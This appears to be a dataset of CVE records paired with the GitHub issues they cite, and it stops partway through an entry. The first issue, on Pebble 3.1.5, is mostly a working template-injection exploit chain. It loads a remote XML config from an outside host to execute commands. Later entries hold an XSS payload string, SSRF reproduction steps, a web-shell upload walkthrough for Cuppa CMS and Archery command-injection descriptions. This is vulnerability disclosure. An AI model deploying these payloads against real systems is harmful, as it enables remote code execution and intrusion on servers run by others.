```java public class BlacklistMethodAccessValidator implements MethodAccessValidator { private static final String[] FORBIDDEN_METHODS = new String[]{"getClass", "wait", "notify", "notifyAll"}; public BlacklistMethodAccessValidator() { } public boolean isMethodAccessAllowed(Object object, Method method) { boolean methodForbidden = object instanceof Class || object instanceof Runtime || object instanceof Thread || object instanceof ThreadGroup || object instanceof System || object instanceof AccessibleObject || this.isUnsafeMethod(method); return !methodForbidden; } private boolean isUnsafeMethod(Method member) { return this.isAnyOfMethods(member, FORBIDDEN_METHODS); } private boolean isAnyOfMethods(Method member, String... methods) { String[] var3 = methods; int var4 = methods.length; for(int var5 = 0; var5 < var4; ++var5) { String method = var3[var5]; if (this.isMethodWithName(member, method)) { return true; } } return false; } private boolean isMethodWithName(Method member, String method) { return member.getName().equals(method); } } ``` Look at the old version of exploit, loading any class by Class.forName,now,no class ```java {% set cmd = 'id' %} {% set bytes = (1).TYPE .forName('java.lang.Runtime') .methods[6] .invoke(null,null) .exec(cmd) %} ``` What can we do? So far we know that many instances of Spring applications are implicitly registered as beans, so can we find an object from a bean that holds a classloader object, and by getting it we can load any object by executing loadClass By debugging we can easily export these beans objects <img width="1261" alt="1" src="https://user-images.githubusercontent.com/56486273/182612181-b21c98e1-b586-4c02-a0b6-d8c863a76a22.png"> So we have to find some eligible beans among these classes ```java org.springframework.context.annotation.internalConfigurationAnnotationProcessor org.springframework.context.annotation.internalAutowiredAnnotationProcessor org.springframework.context.annotation.internalCommonAnnotationProcessor org.springframework.context.event.internalEventListenerProcessor org.springframework.context.event.internalEventListenerFactory hackingpebbleApplication org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory test org.springframework.boot.autoconfigure.AutoConfigurationPackages org.springframework.boot.autoconfigure.context.PropertyPlaceholderAutoConfiguration propertySourcesPlaceholderConfigurer org.springframework.boot.autoconfigure.websocket.servlet.WebSocketServletAutoConfiguration$TomcatWebSocketConfiguration websocketServletWebServerCustomizer org.springframework.boot.autoconfigure.websocket.servlet.WebSocketServletAutoConfiguration org.springframework.boot.autoconfigure.web.servlet.ServletWebServerFactoryConfiguration$EmbeddedTomcat tomcatServletWebServerFactory org.springframework.boot.autoconfigure.web.servlet.ServletWebServerFactoryAutoConfiguration servletWebServerFactoryCustomizer tomcatServletWebServerFactoryCustomizer org.springframework.boot.context.properties.ConfigurationPropertiesBindingPostProcessor org.springframework.boot.context.internalConfigurationPropertiesBinderFactory org.springframework.boot.context.internalConfigurationPropertiesBinder org.springframework.boot.context.properties.BoundConfigurationProperties org.springframework.boot.context.properties.EnableConfigurationPropertiesRegistrar.methodValidationExcludeFilter server-org.springframework.boot.autoconfigure.web.ServerProperties webServerFactoryCustomizerBeanPostProcessor errorPageRegistrarBeanPostProcessor org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration$DispatcherServletConfiguration dispatcherServlet spring.mvc-org.springframework.boot.autoconfigure.web.servlet.WebMvcProperties org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration$DispatcherServletRegistrationConfiguration dispatcherServletRegistration org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration org.springframework.boot.autoconfigure.task.TaskExecutionAutoConfiguration taskExecutorBuilder applicationTaskExecutor spring.task.execution-org.springframework.boot.autoconfigure.task.TaskExecutionProperties org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration$WhitelabelErrorViewConfiguration error beanNameViewResolver org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration$DefaultErrorViewResolverConfiguration conventionErrorViewResolver spring.web-org.springframework.boot.autoconfigure.web.WebProperties org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration errorAttributes basicErrorController errorPageCustomizer preserveErrorControllerTargetClassPostProcessor org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration$EnableWebMvcConfiguration requestMappingHandlerAdapter welcomePageHandlerMapping localeResolver themeResolver flashMapManager mvcConversionService mvcValidator mvcContentNegotiationManager requestMappingHandlerMapping mvcPatternParser mvcUrlPathHelper mvcPathMatcher viewControllerHandlerMapping beanNameHandlerMapping routerFunctionMapping resourceHandlerMapping mvcResourceUrlProvider defaultServletHandlerMapping handlerFunctionAdapter mvcUriComponentsContributor httpRequestHandlerAdapter simpleControllerHandlerAdapter handlerExceptionResolver mvcViewResolver mvcHandlerMappingIntrospector viewNameTranslator org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration$WebMvcAutoConfigurationAdapter defaultViewResolver viewResolver requestContextFilter org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration formContentFilter com.mitchellbosecke.pebble.boot.autoconfigure.PebbleServletWebConfiguration pebbleViewResolver com.mitchellbosecke.pebble.boot.autoconfigure.PebbleAutoConfiguration pebbleLoader springExtension pebbleEngine pebble-com.mitchellbosecke.pebble.boot.autoconfigure.PebbleProperties org.springframework.boot.autoconfigure.jmx.JmxAutoConfiguration mbeanExporter objectNamingStrategy mbeanServer spring.jmx-org.springframework.boot.autoconfigure.jmx.JmxProperties org.springframework.boot.autoconfigure.admin.SpringApplicationAdminJmxAutoConfiguration springApplicationAdminRegistrar org.springframework.boot.autoconfigure.aop.AopAutoConfiguration$ClassProxyingConfiguration forceAutoProxyCreatorToUseClassProxying org.springframework.boot.autoconfigure.aop.AopAutoConfiguration org.springframework.boot.autoconfigure.availability.ApplicationAvailabilityAutoConfiguration applicationAvailability org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$Jackson2ObjectMapperBuilderCustomizerConfiguration standardJacksonObjectMapperBuilderCustomizer spring.jackson-org.springframework.boot.autoconfigure.jackson.JacksonProperties org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$JacksonObjectMapperBuilderConfiguration jacksonObjectMapperBuilder org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$ParameterNamesModuleConfiguration parameterNamesModule org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration$JacksonObjectMapperConfiguration jacksonObjectMapper org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration jsonComponentModule jsonMixinModule org.springframework.boot.autoconfigure.context.ConfigurationPropertiesAutoConfiguration org.springframework.boot.autoconfigure.context.LifecycleAutoConfiguration lifecycleProcessor spring.lifecycle-org.springframework.boot.autoconfigure.context.LifecycleProperties org.springframework.boot.autoconfigure.http.HttpMessageConvertersAutoConfiguration$StringHttpMessageConverterConfiguration stringHttpMessageConverter org.springframework.boot.autoconfigure.http.JacksonHttpMessageConvertersConfiguration$MappingJackson2HttpMessageConverterConfiguration mappingJackson2HttpMessageConverter org.springframework.boot.autoconfigure.http.JacksonHttpMessageConvertersConfiguration org.springframework.boot.autoconfigure.http.HttpMessageConvertersAutoConfiguration messageConverters org.springframework.boot.autoconfigure.info.ProjectInfoAutoConfiguration spring.info-org.springframework.boot.autoconfigure.info.ProjectInfoProperties org.springframework.boot.autoconfigure.sql.init.SqlInitializationAutoConfiguration spring.sql.init-org.springframework.boot.autoconfigure.sql.init.SqlInitializationProperties org.springframework.boot.sql.init.dependency.DatabaseInitializationDependencyConfigurer$DependsOnDatabaseInitializationPostProcessor org.springframework.boot.autoconfigure.task.TaskSchedulingAutoConfiguration scheduledBeanLazyInitializationExcludeFilter taskSchedulerBuilder spring.task.scheduling-org.springframework.boot.autoconfigure.task.TaskSchedulingProperties org.springframework.boot.autoconfigure.web.client.RestTemplateAutoConfiguration restTemplateBuilderConfigurer restTemplateBuilder org.springframework.boot.autoconfigure.web.embedded.EmbeddedWebServerFactoryCustomizerAutoConfiguration$TomcatWebServerFactoryCustomizerConfiguration tomcatWebServerFactoryCustomizer org.springframework.boot.autoconfigure.web.embedded.EmbeddedWebServerFactoryCustomizerAutoConfiguration org.springframework.boot.autoconfigure.web.servlet.HttpEncodingAutoConfiguration characterEncodingFilter localeCharsetMappingsCustomizer org.springframework.boot.autoconfigure.web.servlet.MultipartAutoConfiguration multipartConfigElement multipartResolver spring.servlet.multipart-org.springframework.boot.autoconfigure.web.servlet.MultipartProperties org.springframework.aop.config.internalAutoProxyCreator ``` Fortunately we quickly found a class that fit the criteria and it helped us get the classloader object <img width="521" alt="2" src="https://user-images.githubusercontent.com/56486273/182612219-ec75b2f6-77b1-43cd-ab16-4f459aeba184.png"> It is not enough to execute loadclass, we also need to instantiate the class. And It's also very simple, there is jackson among spring's dependencies, through jackson deserialization we can easily instantiate a class. Fortunately there is this jacksonObjectMapper object in the beans.Now we can instantiate arbitrary classes, and by being able to instantiate arbitrary classes we have bypassed the filtering restrictions In the spring scenario we can easily think of a configuration class org.springframework.context.support.ClassPathXmlApplicationContext, which allows us to load a remote xml configuration file, through which we can easily implement the command execution. But... At this point you will find that any class jackson that inherits from AbstractPointcutAdvisor and AbstractApplicationContext will not be allowed to instantiate ```java public void validateSubType(DeserializationContext ctxt, JavaType type, BeanDescription beanDesc) throws JsonMappingException { Class<?> raw = type.getRawClass(); String full = raw.getName(); if (!this._cfgIllegalClassNames.contains(full)) { if (raw.isInterface()) { return; } if (full.startsWith("org.springframework.")) { Class cls = raw; while(true) { if (cls == null || cls == Object.class) { return; } String name = cls.getSimpleName(); if ("AbstractPointcutAdvisor".equals(name) || "AbstractApplicationContext".equals(name)) { break; } cls = cls.getSuperclass(); } } else if (!full.startsWith("com.mchange.v2.c3p0.") || !full.endsWith("DataSource")) { return; } } ctxt.reportBadTypeDefinition(beanDesc, "Illegal type (%s) to deserialize: prevented for security reasons", new Object[]{full}); } ``` What to do at this time? We found a class called java.beans.Beans in jre. The instantiate method of this class can help us instantiate arbitrary methods. ```java public static Object instantiate(ClassLoader cls, String beanName) throws IOException, ClassNotFoundException { return Beans.instantiate(cls, beanName, null, null); } ``` Here the classloader parameter is allowed to be set to empty, if it is empty later will be through the ClassLoader.getSystemClassLoader (); get, of course, in fact, we also get a classloader at the top which is not the point,It will eventually return an instantiated object based on the beanName passed in. ```java if (result == null) { // No serialized object, try just instantiating the class Class<?> cl; try { cl = ClassFinder.findClass(beanName, cls); } catch (ClassNotFoundException ex) { // There is no appropriate class. If we earlier tried to // deserialize an object and got an IO exception, throw that, // otherwise rethrow the ClassNotFoundException. if (serex != null) { throw serex; } throw ex; } if (!Modifier.isPublic(cl.getModifiers())) { throw new ClassNotFoundException("" + cl + " : no public access"); } /* * Try to instantiate the class. */ try { result = cl.newInstance(); } catch (Exception ex) { // We have to remap the exception to one in our signature. // But we pass extra information in the detail message. throw new ClassNotFoundException("" + cl + " : " + ex, ex); } } ``` So we get the ClassPathXmlApplicationContext class that was forbidden to be instantiated by indirect means. So by stringing these points together we can easily get the following payload ```java {% set y= beans.get("org.springframework.boot.autoconfigure.internalCachingMetadataReaderFactory").resourceLoader.classLoader.loadClass("java.beans.Beans") %} {% set yy = beans.get("jacksonObjectMapper").readValue("{}", y) %} {% set yyy = yy.instantiate(null,"org.springframework.context.support.ClassPathXmlApplicationContext") %} {{ yyy.setConfigLocation("http://xxx.xxx.xxx/1.xml") }} {{ yyy.refresh() }} ``` 1.xml ```xml <?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg > <list> <value>open</value> <value>-a</value> <value>calculator</value> </list> </constructor-arg> </bean> </beans> ``` with http server in your vps ``` python3 -m http.server 80 ``` Successfully triggered command execution by template file called rce.pebble <img width="606" alt="3" src="https://user-images.githubusercontent.com/56486273/182613215-94d98d05-3f5c-4dee-87e4-445dd60c2d2c.png">
command execution vulnerability in pebble 3.1.5(latest)
https://api.github.com/repos/Y4tacker/Web-Security/issues/3/comments
0
2022-08-03T12:51:58Z
2022-09-20T01:19:30Z
https://github.com/Y4tacker/Web-Security/issues/3
1,327,173,676
3
4,125
CVE-2022-38291
2022-09-12T21:15:11.143
SLiMS Senayan Library Management System v9.4.2 was discovered to contain a cross-site scripting (XSS) vulnerability via the Search function. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Search bar.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/156" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/156" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/slims/slims9_bulian/issues/156
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
**Describe the bug** XSS in search bar **To Reproduce** Steps to reproduce the behavior: 1. Go to the website and make sure it has more than 10 bibliography/books 2. put this payload (`<IMG SRC="jav&x09;ascript:alert('XSS');"><script>alert("xss by 0xdc9");</script>`) in the search bar and enter 3. an alert that said "xss_by_0xdc9" should pops **Screenshots** <img width="1440" alt="Screen Shot 2022-08-10 at 01 35 40" src="https://user-images.githubusercontent.com/46653986/183736842-e3d69a1c-8a89-4f27-88ac-c21f0a075b51.png"> <img width="1440" alt="Screen Shot 2022-08-10 at 02 23 15" src="https://user-images.githubusercontent.com/46653986/183744266-c064d591-63ce-487e-ac69-fb5300f81196.png"> **Desktop:** - OS: MacOS Mojave 10.14.6 - Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64) - Slims Version: slims9_bulian-9.4.2
XSS in search bar
https://api.github.com/repos/slims/slims9_bulian/issues/156/comments
0
2022-08-09T18:44:51Z
2022-09-24T03:27:21Z
https://github.com/slims/slims9_bulian/issues/156
1,333,651,959
156
4,126
CVE-2022-38292
2022-09-12T21:15:11.193
SLiMS Senayan Library Management System v9.4.2 was discovered to contain multiple Server-Side Request Forgeries via the components /bibliography/marcsru.php and /bibliography/z3950sru.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/158" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/158" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/slims/slims9_bulian/issues/158
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
**The bug** A Server Side Request Forgery exists in `admin/modules/bibliography/marcsru.php` and `admin/modules/bibliography/z3950sru.php` due to the class in `lib/marc/XMLParser.inc.php` **Reproduce** Steps to reproduce the behavior: 1. Go to `http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography` then go to copy cataloguing 2. choose between marc sru or 23950sru 3. type in something what you want in the search bar 4. set burpsuite intercept on 5. change the `z3950_SRU_source` or `marc_SRU_source` parameter value to some url that grab the traffic 6. forward the request 7. or just visit `http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN` **Screenshots** Normal requests <img width="1435" alt="Screen Shot 2022-08-12 at 04 11 39" src="https://user-images.githubusercontent.com/46653986/184243053-ddf2bf58-051e-4c45-8873-c573c2ce7394.png"> Tampered and SSRF trigger(netcat) <img width="1438" alt="Screen Shot 2022-08-12 at 04 13 21" src="https://user-images.githubusercontent.com/46653986/184243621-ca8f82af-4a18-4abe-8ef4-c69e51c8a60d.png"> Tampered and SSRF trigger(toptal.com) <img width="1440" alt="Screen Shot 2022-08-12 at 04 22 25" src="https://user-images.githubusercontent.com/46653986/184244902-e9df9ed5-7c03-4c0b-bdf9-a58312c3cf67.png"> **Versions** - OS: MacOS Mojave 10.14.6 - Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64) - Slims Version: slims9_bulian-9.4.2
[Security Bugs] Server Side Request Forgery
https://api.github.com/repos/slims/slims9_bulian/issues/158/comments
0
2022-08-11T21:31:20Z
2022-11-24T07:56:26Z
https://github.com/slims/slims9_bulian/issues/158
1,336,516,748
158
4,127
CVE-2022-38295
2022-09-12T21:15:11.243
Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/34" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/34" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/CuppaCMS/CuppaCMS/issues/34
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Cross-Site Scripting exists in Cuppa CMS in Users tap. Discoverer : **Team Am0namiss**(Members : [hoseongJ](https://github.com/hoseongJ), [studdcat](https://github.com/studdcat), [AnonyMousStu](https://github.com/AnonyMousStu), [GuJiseung](https://github.com/GuJiseung), [4dministrat0r](https://github.com/4dministrat0r)) link : http://localhost/cuppa/#/component/table_manager/view/cu_user_groups ![xss1](https://user-images.githubusercontent.com/37374366/183646672-49b28eff-8523-4627-9e53-ee589926497b.png) - Users -> User groups -> Add User group ![xss2](https://user-images.githubusercontent.com/37374366/183646906-41ec5acd-429b-4825-8af6-400a5401c2c4.png) - Write scripts in "Name" field and click "Save" button ![xss3](https://user-images.githubusercontent.com/37374366/183647042-aadb38e0-1e35-4197-ac9e-4e821f1928e0.png) - Check script execution
XSS Vulnerability exists in Cuppa CMS in Users
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/34/comments
0
2022-08-09T12:30:41Z
2022-09-13T11:02:46Z
https://github.com/CuppaCMS/CuppaCMS/issues/34
1,333,188,097
34
4,128
CVE-2022-38296
2022-09-12T21:15:11.297
Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/33" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/CuppaCMS/CuppaCMS/issues/33
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
File upload vulnerability exists in Cuppa CMS in File Manager tap. Discoverer : **Team Am0namiss**(Members : [hoseongJ](https://github.com/hoseongJ), [studdcat](https://github.com/studdcat), [AnonyMousStu](https://github.com/AnonyMousStu), [GuJiseung](https://github.com/GuJiseung), [4dministrat0r](https://github.com/4dministrat0r)) link : http://localhost/cuppa/media/attack.php (WebShell URL) ![cuppa fileupload 1](https://user-images.githubusercontent.com/37374366/183644230-44f93df4-d8f9-4d5e-ba17-cf12d846f6b1.png) ![cuppa fileupload 2](https://user-images.githubusercontent.com/37374366/183644414-2725d017-dc20-49f8-b162-7ab848a4ad98.png) ![cuppa fileupload 3](https://user-images.githubusercontent.com/37374366/183644432-5d54afea-96c4-49ef-81d6-b077d12879ec.png) - Click "rename" check in BurpSuite. And rename in BurpSuite. ![cuppa fileupload 4](https://user-images.githubusercontent.com/37374366/183644716-55420d8b-4389-4aae-916f-74e1da4c25f7.png) - Click "show URL" button and copy URL. ![cuppa fileupload 5](https://user-images.githubusercontent.com/37374366/183644772-37433d58-3228-4a59-9a66-c803bf044b1e.png) - Run Web Shell in Cuppa CMS
File Upload Vulnerability exists in Cuppa CMS in File Manager
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/33/comments
0
2022-08-09T12:17:02Z
2022-09-13T11:02:31Z
https://github.com/CuppaCMS/CuppaCMS/issues/33
1,333,171,744
33
4,129
CVE-2022-38537
2022-09-13T15:15:08.973
Archery v1.4.5 to v1.8.5 was discovered to contain multiple SQL injection vulnerabilities via the start_file, end_file, start_time, and stop_time parameters in the binlog2sql interface.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://announcements.bybit.com/en-US/article/bybit-improves-the-security-of-the-open-source-community-blt626818c0ee8c48a6/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hhyo/Archery/blob/v1.8.5/sql/urls.py#L135" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hhyo/Archery/issues/1842" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://announcements.bybit.com/en-US/article/bybit-improves-the-security-of-the-open-source-community-blt626818c0ee8c48a6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hhyo/Archery/blob/v1.8.5/sql/urls.py#L135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hhyo/Archery/issues/1842" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:archerydms:archery:*:*:*:*:*:*:*:*", "matchCriteriaId": "F38198C3-79F6-4978-8227-0D784F625903", "versionEndExcluding": "1.9.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.4.5", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/hhyo/Archery/issues/1842
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hhyo", "Archery" ]
### 重现步骤 https://github.com/hhyo/Archery/blob/v1.8.5/sql/plugins/my2sql.py#L36 Plugin my2sql has a problem with the filtering method of start_time and stop_time parameters, which leads to injection system command execution, resulting in a remote command execution vulnerability. https://github.com/hhyo/Archery/blob/v1.8.5/sql/plugins/binglog2sql.py#L43 Plugin binlog2sql has problems in the filtering method of start_file, end_file, start_time, stop_time parameters, which leads to injection system command execution, resulting in remote command execution vulnerability. https://github.com/hhyo/Archery/blob/v1.8.5/sql/archiver.py#L283 https://github.com/hhyo/Archery/blob/v1.8.5/sql/plugins/pt_archiver.py#L41 Plugin archiver do not filter `where` parameter, which leads to the execution of injectable system commands, resulting in a remote command execution vulnerability. Users in the DBA role can create malicious workflow and execute the workflow. ### 预期外的结果 Improper use of shlex.quote can cause quote bypassing with one more quote, and cause remote command execution. ### 日志文本 _No response_ ### 版本 v1.8.5 ### 部署方式 Docker ### 是否还有其他可以辅助定位问题的信息?比如数据库版本等 _No response_
Multiple Remote Code Executioin
https://api.github.com/repos/hhyo/Archery/issues/1842/comments
0
2022-09-19T02:30:23Z
2022-09-19T13:45:32Z
https://github.com/hhyo/Archery/issues/1842
1,377,303,744
1,842
4,130
CVE-2022-38538
2022-09-13T15:15:09.023
Archery v1.7.0 to v1.8.5 was discovered to contain a SQL injection vulnerability via the checksum parameter in the report module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://announcements.bybit.com/en-US/article/bybit-improves-the-security-of-the-open-source-community-blt626818c0ee8c48a6/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hhyo/Archery/blob/v1.8.5/sql/urls.py#L145" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hhyo/Archery/issues/1841" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://announcements.bybit.com/en-US/article/bybit-improves-the-security-of-the-open-source-community-blt626818c0ee8c48a6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hhyo/Archery/blob/v1.8.5/sql/urls.py#L145" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hhyo/Archery/issues/1841" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:archerydms:archery:*:*:*:*:*:*:*:*", "matchCriteriaId": "AF3B860B-7F06-4778-9FCD-7A153778CE30", "versionEndExcluding": "1.9.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.4.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
